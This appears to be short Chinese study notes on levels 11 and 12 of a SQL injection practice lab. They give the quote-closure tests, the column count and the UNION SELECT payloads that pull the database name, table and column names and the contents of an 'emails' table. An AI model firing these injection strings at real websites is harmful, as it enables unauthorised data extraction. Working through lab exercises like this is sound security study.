less-11
11关变成post表单,按之前的方法,尝试在输入位置尝试闭合方法,看是否被带入运行sql语句,'or 1=1代入运行成功
判断字段数order by 2
' union select 1,database() -- 1,爆出库名
与之前语句类似,'union select 1,table_name from information_schema.tables where table_schema='security' -- 1,爆表名
'union select 1,column_name from information_schema.columns where table_schema='security' and table_name='emails' -- q,爆列名
爆数据 'union select 1,id from emails -- q
爆数据 'union select 1,(select group_concat(id) from emails) -- q,前面的操作也可以用group_concat方法
less-12
与上关一样,只是闭合问题,")
